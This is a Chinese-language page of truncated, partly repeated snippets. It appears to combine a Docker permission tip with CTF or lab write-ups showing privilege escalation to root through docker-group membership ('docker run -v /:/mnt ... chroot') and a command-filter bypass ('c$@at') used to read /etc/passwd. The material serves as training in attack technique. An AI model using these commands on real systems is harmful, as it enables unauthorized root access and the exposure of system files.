直接使用命令docker ps,报错... permission dinned ...,一种解决方法是使用sudo docker ps,但这样比较麻烦,每次需要输入sudo,二是进入 root 用户, 不安全。 最好的解决方案是将当前用户添加到 docker 组中,即可获得 docker 的操作权限。 首先确认 docker 用户组是否存在 getent grou
docker提权命令 人间正道是沧桑
这个凭证可以登录anurodh的ssh 登录进去以后传linpeas,发现当前用户在docker用户组,可以利用组权限提权 anurodh@ubuntu:/tmp$ id uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker) 提权到root anurodh@ubuntu:/tmp$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # id uid=0...
登录进去以后传linpeas,发现当前用户在docker用户组,可以利用组权限提权 anurodh@ubuntu:/tmp$ id uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker) 提权到root anurodh@ubuntu:/tmp$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # id uid=0(root) gid=0(root) groups...
打开发现是一个命令行执行程序 经过测试,命令行做了一些过滤,很多命令都不能正常执行,但是我们可以用$@绕过 比如查看/etc/passwd c$@at/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ...